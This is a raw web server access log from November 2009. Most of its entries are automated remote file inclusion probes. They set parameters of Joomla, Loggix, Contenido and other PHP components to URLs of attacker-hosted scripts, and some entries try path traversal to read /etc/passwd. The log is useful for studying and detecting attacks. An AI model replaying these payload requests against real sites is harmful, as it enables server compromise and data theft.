78.159.115.249 - - [13/Nov/2009:00:52:25 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:00:52:25 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:00:52:25 -0500] "GET /logs/access_log.Q109061400//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.159.115.249 - - [13/Nov/2009:00:52:34 -0500] "GET /logs/access_log.Q109052300//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:03 -0500] "GET /logs/access_log.Q109092500//lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:03 -0500] "GET //lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:04 -0500] "GET /logs/error_log.Q109092500//lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:04 -0500] "GET /logs//lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:11 -0500] "GET /logs/access_log.Q109092500//lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:11 -0500] "GET /logs//lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:11 -0500] "GET //lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:53:11 -0500] "GET /logs/error_log.Q109092500//lib/Loggix/Module/Comment.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:00:54:56 -0500] "GET /logs/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:00:54:56 -0500] "GET /templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:00:54:56 -0500] "GET /logs/access_log.Q109051000/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:00:55:09 -0500] "GET /logs/error_log.Q109051000/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
219.254.35.13 - - [13/Nov/2009:00:57:22 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:22 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:00:57:27 -0500] "GET /logs/access_log.Q109051200%20%20//skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:29 -0500] "GET /logs/access_log.Q109081100///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:33 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:33 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:00:57:42 -0500] "GET /logs/access_log.Q109051200%20%20//skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:42 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:42 -0500] "GET /logs/access_log.Q109081100///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:41 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:44 -0500] "GET /logs/error_log.Q109081100///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:57:45 -0500] "GET /logs/access_log.Q109081100///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:00:58:00 -0500] "GET /logs/access_log.Q109053100%20%20//skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:58:01 -0500] "GET /logs/error_log.Q109081100///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:00:58:02 -0500] "GET /logs/error_log.Q109081100///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:00:58:17 -0500] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [13/Nov/2009:00:58:17 -0500] "GET //skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:00:58:17 -0500] "GET /logs/access_log.Q109053100%20%20//skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:58:31 -0500] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:58:31 -0500] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:00:58:35 -0500] "GET /logs/access_log.Q109091600/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:58:52 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:58:52 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:00:58:52 -0500] "GET /logs/access_log.Q109060500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.219.57.220 - - [13/Nov/2009:00:58:53 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
91.191.173.120 - - [13/Nov/2009:00:58:53 -0500] "GET /logs/access_log.Q109091600/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:01 -0500] "GET //lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:01 -0500] "GET /logs/error_log.Q109092500//lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:01 -0500] "GET /logs/access_log.Q109092500//lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:01 -0500] "GET /logs//lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:19 -0500] "GET /logs//lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:19 -0500] "GET //lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:19 -0500] "GET /logs/access_log.Q109092500//lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.110.50.121 - - [13/Nov/2009:00:59:19 -0500] "GET /logs/error_log.Q109092500//lib/Rss.php?pathToIndex=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:00:59:53 -0500] "GET /logs/access_log.Q109091600/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.36.134.183 - - [13/Nov/2009:01:00:48 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
74.36.134.183 - - [13/Nov/2009:01:00:48 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
74.36.134.183 - - [13/Nov/2009:01:00:53 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
74.36.134.183 - - [13/Nov/2009:01:00:53 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)"
219.254.35.13 - - [13/Nov/2009:01:00:54 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:00:59 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:01:06 -0500] "GET /logs/access_log.Q109081100%20%20///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
195.219.57.220 - - [13/Nov/2009:01:01:06 -0500] "GET //components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
219.254.35.13 - - [13/Nov/2009:01:01:06 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:01:16 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Nov/2009:01:01:28 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
219.254.35.13 - - [13/Nov/2009:01:01:30 -0500] "GET /logs/access_log.Q109081100%20%20///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:01:30 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:01:37 -0500] "GET /logs/access_log.Q109081100%20%20///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
219.254.35.13 - - [13/Nov/2009:01:01:37 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 200 25812 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:01:03:07 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:01:03:07 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
202.123.212.188 - - [13/Nov/2009:01:03:07 -0500] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:03:40 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:03:40 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:03:41 -0500] "GET /logs/access_log.Q109073100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:03:44 -0500] "GET /logs/access_log.Q109091600/.rfi%20/include/admin.lib.inc.php?site_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
74.50.85.15 - - [13/Nov/2009:01:03:53 -0500] "GET /logs/access_log.Q109070400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://scanzz.fileave.com/meta1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.68.145 - - [13/Nov/2009:01:07:17 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0152A25B10213200567B086+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.102 - - [13/Nov/2009:01:07:27 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0152A25B1FF16200556B086+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.123.212.188 - - [13/Nov/2009:01:07:40 -0500] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.supliment.polirom.ro/brd/id1.gif??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:01:08:25 -0500] "GET /logs/access_log.Q109052300/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:01:08:25 -0500] "GET /templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:01:08:25 -0500] "GET /logs/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
62.182.62.35 - - [13/Nov/2009:01:08:46 -0500] "GET /logs/error_log.Q109061500/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
195.219.57.220 - - [13/Nov/2009:01:09:16 -0500] "GET /logs/access_log.Q109080400//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
195.219.57.220 - - [13/Nov/2009:01:09:16 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
91.191.173.120 - - [13/Nov/2009:01:09:25 -0500] "GET /logs/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:09:25 -0500] "GET /errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.219.57.220 - - [13/Nov/2009:01:09:28 -0500] "GET /logs/error_log.Q109072700//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
195.219.57.220 - - [13/Nov/2009:01:09:28 -0500] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
91.191.173.120 - - [13/Nov/2009:01:09:32 -0500] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:09:32 -0500] "GET /errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:09:32 -0500] "GET /logs/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:09:36 -0500] "GET /logs/access_log.Q109051400%20%20/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:09:38 -0500] "GET /logs/access_log.Q109092600%20%20/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.191.173.120 - - [13/Nov/2009:01:09:47 -0500] "GET /logs/access_log.Q109092600%20%20/errors.php?error=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.219.57.220 - - [13/Nov/2009:01:09:53 -0500] "GET /logs/error_log.Q109052100//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.805"
115.86.49.6 - - [13/Nov/2009:01:10:07 -0500] "GET /logs/access_log.Q109090400///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
115.86.49.6 - - [13/Nov/2009:01:10:07 -0500] "GET ///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
115.86.49.6 - - [13/Nov/2009:01:10:15 -0500] "GET /logs/error_log.Q109090400///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
116.127.121.116 - - [13/Nov/2009:01:10:47 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:10:47 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:10:47 -0500] "GET /logs/access_log.Q109091500//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:11:08 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:11:08 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:11:08 -0500] "GET /logs/access_log.Q109091500%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:11:09 -0500] "GET /logs/access_log.Q109101400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
115.86.49.6 - - [13/Nov/2009:01:11:17 -0500] "GET /logs/access_log.Q109090400///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:01:11:17 -0500] "GET ///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
115.86.49.6 - - [13/Nov/2009:01:11:28 -0500] "GET /logs///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
116.127.121.116 - - [13/Nov/2009:01:11:30 -0500] "GET /logs/access_log.Q109101400%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.68.145 - - [13/Nov/2009:01:11:42 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0152A25B10715200587B086+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
115.86.49.6 - - [13/Nov/2009:01:11:46 -0500] "GET /logs/error_log.Q109090400///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
195.219.57.220 - - [13/Nov/2009:01:12:12 -0500] "GET /logs/error_log.Q109052700//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cextor.fileave.com/setsot/safe.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
201.218.228.226 - - [13/Nov/2009:01:12:48 -0500] "GET //skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
201.218.228.226 - - [13/Nov/2009:01:12:48 -0500] "GET /logs//skin/happycast_category_lightblack/login.php?dir=http://sensetautonomie.fr/id1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
115.86.49.6 - - [13/Nov/2009:01:13:08 -0500] "GET ///include/mail.inc.php?skin_board_path=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
202.131.226.52 - - [13/Nov/2009:01:13:19 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:13:19 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:13:19 -0500] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:13:19 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 200 25813 "-" "Mozilla/5.0"
75.126.213.58 - - [13/Nov/2009:01:13:34 -0500] "GET /logs/error_log.Q109070300/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 272 "-" "libwww-perl/5.831"
75.126.213.58 - - [13/Nov/2009:01:13:34 -0500] "GET /logs/access_log.Q109071500/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 273 "-" "libwww-perl/5.831"
75.126.213.58 - - [13/Nov/2009:01:13:48 -0500] "GET /logs/error_log.Q109072300%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 273 "-" "libwww-perl/5.831"
116.127.121.116 - - [13/Nov/2009:01:13:52 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:13:52 -0500] "GET /logs/access_log.Q109052600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:13:52 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
